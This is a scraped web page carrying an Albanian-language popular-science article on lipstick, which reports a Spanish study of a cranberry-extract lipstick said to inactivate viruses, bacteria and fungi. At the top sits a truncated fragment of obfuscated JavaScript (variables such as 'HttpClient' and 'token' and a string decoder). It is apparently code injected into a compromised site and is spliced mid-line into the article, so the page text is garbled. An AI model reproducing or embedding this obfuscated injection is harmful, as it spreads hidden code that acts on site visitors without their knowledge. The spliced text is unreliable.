;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Çfarë përfitimit shëndetësor ka buzëkuqi?

By

Në Egjiptin e lashtë, burrat dhe gratë lyenin buzët si pjesë e rutinës së tyre të bukurisë.

Por, në fillim të shekullit XX, buzëkuqi u lidh me aktore si Marilyn Monroe, por edhe me luftën e grave për barazi. Sot, shkencëtarët besojnë se një buzëkuq mund të ketë efekt pozitiv edhe kur kemi të bëjmë me viruse dhe baktere.

Edhe pse në të kaluarën produktet që njerëzit përdornin për të ngjyrosur buzët e tyre bazoheshin në përbërës natyralë, metodat e përpunimit tani kanë ndryshuar. Një studim i fundit zbuloi se buzëkuqi është një nga shumë produkte që përmbajnë kimikate të afta të prishin sistemin endokrin.

Prandaj, në kërkim të kthimit të kompozimeve natyrale në kozmetologji dhe me synimin për të kufizuar gamën e mikrobeve, shkencëtarët po i drejtohen përdorimit të frutave me ngjyra të ndezura.

Studimet e fundit, kanë raportuar se formulat e buzëkuqit që përfshijnë agjentë ngjyrues natyralë, të tillë si frutat me ngjyrë të ndezur, ruajnë ngjyrën e kuqe të gjallë duke ofruar gjithashtu përfitime antimikrobike. Përveç kësaj, ekstrakti i boronicës së kuqe është treguar se ngordh mikrobet e rrezikshme.

Dr. Ángel Serrano-Aroca dhe ekipi i tij në Spanjë donin të hetonin më tej përdorimin e ekstraktit të boronicës së kuqe për të krijuar një nuancë të kuqe të thellë buzëkuqi. Produkti përfundimtar ndriçon buzët e grave, duke nxjerrë në pah feminilitetin, duke i mbrojtur ato edhe nga mikrobet patogjene.

Për formulën, studiuesit shtuan ekstrakt boronicë në bazën e kremit të buzëkuqit me gjalpë shea, vitaminë E, provitaminë B5, vaj kokosi dhe vaj avokado.

Më pas ata aplikuan përzierjen në kultura të viruseve të ndryshme, baktereve dhe një lloj myku. Të dy variantet e virusit u çaktivizuan shpejt, ndërsa buzëkuqi bllokoi mikrobet brenda një minute kontakti. Edhe bakteret shumë-rezistente, mykobakteret dhe kërpudhat u dobësuan dhe u çaktivizuan ndjeshëm brenda pesë orëve nga aplikimi.

Gjetjet e tyre përfundimisht sugjerojnë se formula e tyre e re mund të ketë një vend në tregun e kozmetikës si një produkt mbrojtës kundër mikroorganizmave.

Artikuj të ngjashëm